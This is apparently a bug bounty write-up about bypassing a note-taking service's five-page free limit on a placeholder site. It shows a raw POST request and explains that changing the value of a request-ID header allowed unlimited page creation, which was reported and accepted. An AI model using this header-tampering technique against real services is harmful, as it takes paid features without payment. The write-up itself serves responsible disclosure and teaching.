Header manipulation to get the premier feature for free

Case Study

As always let’s assume the company name as example.com. This company offers you to have private notes/pages. For the free version it offers 5 pages, to upgrade from 5 pages to unlimited pages you need to pay some amount of money.

The working of the application

  1. Click on create a page
  2. Enter page name and details
  3. Click on Save

After you save the 5th page, Create page button is disabled.

POC

To create more pages, I tried to send the request to the intruder and fired100 null payloads, but no success as they have some kind of verification.

giphy

The next think that came in my mind is to see the requests, so I deleted all the pages and started creating pages again to observe changes in the post request

In the Header there is a parameter with X-company_name-reqid: some_randomvalue + number_ending_with_1,2,3 and so on.

POST /1/page HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/bugcrowd27
Content-Type: application/json
x-example-client-version: build-6226
x-example-reqid: randomvalue.2349934923493408030305501
Content-Length: 383
Connection: close
Cookie: 

{"name":"bugcrowd6","idOrganization":"5f6e234dffa0401f3f0dfd","prefs_permissionLevel":"org","prefs_selfJoin":true,"defaultLists":false,"prefs_background_url":"https://image_link9.com?test.jpg?w=2560&h=2048&q=90","token":"5e3a4fb3d19ce378asfsaf00/T8n7AaesrwgvRlmc6mu79JvYEHNGgfZQKzmykYp3Uflmasidfasf53fXJ2DLiP"}

to create unlimited pages I just have to change the value of Header X-company_name-reqid:

x-example-client-version: build-6226
x-example-reqid: randomvalue.2349934923493408030305501,2,3 and so one

and I was able to create unlimited pages.

giphy

Reported
Accepted as P3 – $XXX dollars